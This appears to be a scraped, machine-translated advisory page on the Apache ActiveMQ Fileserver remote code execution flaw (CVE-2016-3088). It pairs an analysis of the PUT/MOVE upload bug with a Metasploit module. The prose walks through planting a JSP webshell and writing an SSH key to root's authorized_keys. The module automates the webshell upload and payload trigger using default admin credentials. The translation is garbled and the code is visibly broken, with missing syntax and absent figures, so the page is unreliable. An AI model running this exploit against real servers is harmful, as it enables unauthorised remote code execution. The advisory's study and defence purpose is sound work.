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HistoryJul 04, 2017 - 12:00 a.m.

Apache ActiveMQ Fileserver remote code execution vulnerability(CVE-2016-3088)


0.84 High




Author: The know Chong Yu 404 laboratory

1. Background overview

ActiveMQ is an Apache Software Foundation under an open source message-driven middleware software. Jetty is an open source servlet container, it is based on Java web container such as JSP and servlet to provide the running environment. ActiveMQ 5.0 and later versions the default integrated jetty. After the start to provide a monitoring ActiveMQ Web application.

2016 4 November 14, the overseas security researchers Simon Zuckerbraun exposure Apache ActiveMQ Fileserver there are multiple security vulnerabilities allowing a remote attacker to use malicious code to replace the Web application on an affected system to remote code execution(CVE-2016-3088)。

2. Principles of analysis

ActiveMQ in the FileServer service allows the user through the HTTP PUT method to upload a file to a specified directory,download ActiveMQ 5.7.0 source code , you can see the background processing PUT the key code is as follows

The user can upload a file to a specified directory, the path in the conf/jetty.xml in the definition, as follows

Interestingly, we forged a special upload path, you can burst an absolute path

Along the PUT method to track, you can see the call to the following function

At the same time see the background processing to MOVE the key code is as follows, You can see the method is not for the purpose of path any restrictions or filtering.

Thus, we can construct a PUT request to upload a webshell to the fileserver directory, and then by the Move method to move it to have execute permissions for the admin/ directory.

3. Exploit a variety of poses

According to the above vulnerability principle, we can think of a variety of the use of poses.

Note: the following results are in the ActiveMQ 5.7.0 in the reproduction, the reproduction process of the MOVE method use is very unstable.

  • Upload Webshell way

First PUT a Jsp Webshell to the fileserver directory

In the fileserver/ directory Webshell and no execute permissions

Proof about the absolute path

Then use the MOVE method to the Webshell moved into the admin/ directory, you can also use relative paths

Visit http://localhost:8161/admin/1. jsp? cmd=ls, the command successfully executes, the results are as follows

  • Upload the SSH public key mode

Since can be arbitrary file upload and moving, very natural can think to upload our ssh public key, enabling SSH login.

First generate the key pair. If it’s already there then not required

Then upload, move to the/root/. ssh/and rename to authorized_keys

Directly after the ssh login.

4. Vulnerability

The vulnerability affects versions: Apache ActiveMQ 5. x ~ 5.14.0

In ZoomEye with date and ActiveMQ as a key to retrieve, respectively, the detection of the 2015 1 month 1 day vulnerability before the outbreak of the one year and 2017 year 1 month 1 day vulnerability after the outbreak of the one year Internet on ActiveMQ the total amount of the case, as follows.

You can see that ActiveMQ in the number of vulnerabilities the outbreak of the front and rear there is a very substantial reduction, from which we can generally guess the vulnerabilities after the outbreak of the many ActiveMQ Web service is restricted from public access.

5. Vulnerability protection programme

1, The ActiveMQ Fileserver function in 5.14.0 and later versions has been removed. Users are recommended to upgrade to 5.14.0 and later versions.

2, by removing conf\jetty.xml the following configuration to disable the ActiveMQ Fileserver function

6. Reference links


# This module requires Metasploit:
# Current source:
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
      'Name'        => 'ActiveMQ web shell upload',
      'Description' => %q(
        The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0
        allows remote attackers to upload and execute arbitrary files via an
        HTTP PUT followed by an HTTP MOVE request.
      'Author'      => [ 'Ian Anderson <andrsn84[at]>', 'Hillary Benson <1n7r1gu3[at]>' ],
      'License'     => MSF_LICENSE,
      'References'  =>
          [ 'CVE', '2016-3088' ],
          [ 'URL', '' ]
      'Privileged'  => true,
      'Platform'    => %w{ java linux win },
      'Targets'     =>
          [ 'Java Universal',
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
          [ 'Linux',
              'Platform' => 'linux',
              'Arch' => ARCH_X86
          [ 'Windows',
               'Platform' => 'win',
               'Arch' => ARCH_X86
      'DisclosureDate' => "Jun 01 2016",
      'DefaultTarget'  => 0))
      ['BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),'BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),'JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),'AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
      ['UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])

  def jsp_text(payload_name)
    <%@ page import="*"
    %><%@ page import="*"
    URLClassLoader cl = new[]{new"./#{payload_name}.jar")).toURI().toURL()});
    Class c = cl.loadClass("metasploit.Payload");
    c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});

  def exploit
    jar_payload = payload.encoded_jar.pack
    payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
    host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
    @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
    paths = get_upload_paths
    paths.each do |path|
      if try_upload(path, jar_payload, payload_name)
        break handler if trigger_payload(payload_name)
        print_error('Unable to trigger payload')

  def try_upload(path, jar_payload, payload_name)
    ['.jar', '.jsp'].each do |ext|
      file_name = payload_name + ext
      data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
      upload_uri = normalize_uri('fileserver', file_name)
      print_status("Uploading #{move_headers['Destination']}")
      register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
      return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
                              send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
      @trigger_resource = /webapps(.*)/.match(path)[1]

  def get_upload_paths
    base_path = "#{get_install_path}/webapps"
    custom_path = datastore['UploadPath']
    return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
    [ "#{base_path}/api/", "#{base_path}/admin/" ]

  def get_install_path
    properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
    match ="\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
    return match[1] unless match.nil?

  def send_request(method, uri, expected_response = 200, opts = {})
    opts['headers'] ||= {}
    opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
    opts['headers']['Connection'] = 'close'
    r = send_request_cgi(
        'method'  => method,
        'uri'     => uri
    return false if r.nil? || expected_response != r.code.to_i

  def trigger_payload(payload_name)
    send_request('POST', @url + @trigger_resource + payload_name + '.jsp')

  def error_out
    print_error('Upload failed')
    @trigger_resource = nil